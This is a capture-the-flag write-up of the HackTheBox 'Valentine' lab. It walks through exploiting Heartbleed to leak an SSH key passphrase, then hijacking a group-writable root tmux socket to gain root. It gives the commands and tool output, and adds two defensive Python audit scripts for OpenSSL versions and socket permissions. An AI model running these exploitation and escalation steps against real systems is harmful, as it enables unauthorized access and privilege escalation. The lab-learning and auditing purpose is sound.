An easy Linux box from HackTheBox, using Heartbleed for initial access and then taking over a root tmux session to get root.

Valentine

Recon

The usual nmap doesn't return much: ssh, http, and https.

The website itself is just a photo, nothing to click on, no steganography.

Running gobuster with the following parameters:

sudo gobuster dir -u 10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o valentine.dir

Found 3 interesting directories: /dev, /decode and /encode.

Inside /dev there's a file called notes.txt:

To do:

1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.

So it seems /decode and /encode are vulnerable in some way.

Also inside /dev is a file called "hype_key", composed of a bunch of hex; converted to ASCII it becomes an RSA private key.

Testing /encode, the encoder is just base64: encoding "aaa" gives "YWFh".

Testing the site further shows it's running PHP, since /encode and /decode also work as /encode.php and /decode.php.

Exploitation

Got stuck here forever: the RSA key needed a passphrase. Apparently the image on the site is the hint.

It's a Heartbleed box. Could've also run the "vuln" nmap script:

sudo nmap --script vuln -oA vuln-scan 10.10.10.79

to find that the SSL service is vulnerable to Heartbleed:

 ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
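The nmap output above names the affected range in prose. As an added example (not from the writeup, and not the nmap script's own logic), here is a small Python inventory check that turns that range into code: given `openssl version` banners collected from hosts, it flags the ones in the affected 1.0.1 through 1.0.1f range or the 1.0.2-beta1 pre-release, which is the fleet-wide question a defender asks before patching. The host names and banners in `SAMPLE_INVENTORY` are constructed, and the function names are my own.

```python
import re

# Affected range as stated in the advisory text: 1.0.1 through 1.0.1f (the fix
# shipped in 1.0.1g) plus the 1.0.2-beta1 pre-release. Other branches (1.0.0,
# 1.1.x, 3.x) never carried the bug, so they are not flagged here.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)([a-z]*)(?:-(beta\d+))?$")


def parse_openssl_version(text):
    """Parse '1.0.1f' or '1.0.2-beta1' into (major, minor, patch, letter, beta)."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised OpenSSL version: %r" % text)
    major, minor, patch, letter, beta = m.groups()
    return int(major), int(minor), int(patch), letter, beta


def is_heartbleed_affected(text):
    """True if this OpenSSL version falls inside the Heartbleed-affected range."""
    major, minor, patch, letter, beta = parse_openssl_version(text)
    if (major, minor, patch) == (1, 0, 1):
        # Plain 1.0.1 (and its pre-release builds) and letters a..f predate the
        # fix; 1.0.1g and later carry it.
        return letter == "" or letter <= "f"
    if (major, minor, patch) == (1, 0, 2):
        return beta == "beta1"
    return False


def version_from_banner(banner):
    """Extract the version token from an 'openssl version' banner line,
    e.g. 'OpenSSL 1.0.1f 6 Jan 2014' -> '1.0.1f'."""
    m = re.search(r"OpenSSL\s+(\S+)", banner)
    if not m:
        raise ValueError("not an OpenSSL version banner: %r" % banner)
    return m.group(1)


def audit_inventory(inventory):
    """Return the sorted list of hosts whose banner shows an affected version."""
    flagged = []
    for host, banner in inventory.items():
        if is_heartbleed_affected(version_from_banner(banner)):
            flagged.append(host)
    return sorted(flagged)


# Constructed sample inventory; the host names and banners are made up for the demo.
SAMPLE_INVENTORY = {
    "web-01": "OpenSSL 1.0.1f 6 Jan 2014",
    "web-02": "OpenSSL 1.0.1g 7 Apr 2014",
    "proxy-01": "OpenSSL 1.0.2-beta1 24 Feb 2014",
    "db-01": "OpenSSL 1.0.0l 6 Jan 2014",
    "bastion": "OpenSSL 1.1.1k 25 Mar 2021",
}

if __name__ == "__main__":
    for host in audit_inventory(SAMPLE_INVENTORY):
        print("PATCH NEEDED:", host, SAMPLE_INVENTORY[host])
```

The version letter comparison works because OpenSSL 1.0.1 patch releases used single lowercase letters in order, so a plain string comparison against "f" is enough for that branch.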

Download a Heartbleed Python exploit from GitHub and execute it:

python2 heartbleed.py 10.10.10.79

It grabs leaked memory and writes it to out.txt as a hex dump; convert the hex back to ASCII with xxd:

xxd -r out.txt > ascii.txt

Inside ascii.txt there's a base64-encoded value:

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

which decodes to

heartbleedbelievethehype

Possibly the passphrase for the RSA key; let's try it with

openssl rsa -in hype_key_ascii -out rsa.txt

It worked!

Since the RSA key was named "hype_key", let's try the username "hype" to ssh in:

ssh -i rsa.txt hype@10.10.10.79

Now we have a low-privilege shell and can grab user.txt from the desktop.

Running linpeas.sh, find that there's a tmux session running as root:

root       1030  0.0  0.1  26416  1672 ?        Ss   13:17   0:08 /usr/bin/tmux -S /.devs/dev_sess

Checking if we can write to the session socket:

hype@Valentine:/tmp$ ls -la /.devs/dev_sess 
srw-rw---- 1 root hype 0 May 13 13:17 /.devs/dev_sess

We can (the socket's group is hype and it's group-writable), so let's take over by running the same command we saw above, with the same socket, -S /.devs/dev_sess:

tmux -S /.devs/dev_sess

It opens a tmux session as root!
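The whole escalation rests on one permission bit: a root-owned tmux socket that another account's group can write to. As an added example (not from the writeup, not linpeas code), here is a Python audit helper that expresses the check the `ls -la` step performs by hand: it parses an ls-style mode such as `srw-rw----`, reports which non-owner accounts can connect to a Unix socket (connecting needs write permission), and can run the same check against a live path with `lstat`. The function names are mine, and the `demo_live_socket` helper creates a throwaway socket in a temp directory purely so the live check has something to look at. The remediation a hardening review would ask for is the obvious one: root tmux sockets should be mode 600, or the session should not be left running at all.

```python
import grp
import os
import pwd
import socket
import stat
import tempfile

_KINDS = {"s": "socket", "-": "file", "d": "directory", "l": "symlink",
          "p": "fifo", "c": "char", "b": "block"}


def parse_ls_mode(mode_str):
    """Turn an ls-style mode such as 'srw-rw----' into (file_type, permission_bits)."""
    if len(mode_str) != 10:
        raise ValueError("expected a 10-character mode string, got %r" % mode_str)
    bits = 0
    for ch in mode_str[1:]:
        bits <<= 1
        # 'S' and 'T' mean setuid/setgid/sticky without the execute bit
        if ch not in "-ST":
            bits |= 1
    return _KINDS.get(mode_str[0], "other"), bits


def assess_socket(file_type, mode, owner, group):
    """Report who, besides the owner, can connect to a Unix socket."""
    if file_type != "socket":
        return None
    findings = []
    if mode & stat.S_IWGRP:
        findings.append("group %s can connect" % group)
    if mode & stat.S_IWOTH:
        findings.append("everyone can connect")
    return {"owner": owner, "group": group, "mode": mode,
            "exposed": bool(findings), "findings": findings}


def assess_ls_line(line):
    """Assess one 'ls -la' line, e.g. the one captured in the writeup."""
    fields = line.split()
    ftype, mode = parse_ls_mode(fields[0])
    return assess_socket(ftype, mode, owner=fields[2], group=fields[3])


def _name(lookup, ident):
    try:
        return lookup(ident)
    except KeyError:  # uid/gid with no passwd/group entry (common in containers)
        return str(ident)


def assess_path(path):
    """Run the same check against a live filesystem object via lstat."""
    st = os.lstat(path)
    if not stat.S_ISSOCK(st.st_mode):
        return None
    owner = _name(lambda u: pwd.getpwuid(u).pw_name, st.st_uid)
    group = _name(lambda g: grp.getgrgid(g).gr_name, st.st_gid)
    return assess_socket("socket", stat.S_IMODE(st.st_mode), owner, group)


def demo_live_socket(mode=0o660):
    """Create a throwaway Unix socket with the given mode and assess it (constructed demo)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "dev_sess")
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        try:
            s.bind(path)
            os.chmod(path, mode)
            return assess_path(path)
        finally:
            s.close()


# The ls line from the writeup, used here as sample input.
WRITEUP_LS_LINE = "srw-rw---- 1 root hype 0 May 13 13:17 /.devs/dev_sess"

if __name__ == "__main__":
    result = assess_ls_line(WRITEUP_LS_LINE)
    print("mode %o owner %s: %s" % (result["mode"], result["owner"],
                                   "; ".join(result["findings"]) or "owner only"))
    print("live 0660 demo exposed:", demo_live_socket(0o660)["exposed"])
    print("live 0600 demo exposed:", demo_live_socket(0o600)["exposed"])
```

The live check uses `lstat` rather than `stat` so a symlink planted at a socket path is reported as a symlink, not as whatever it points to.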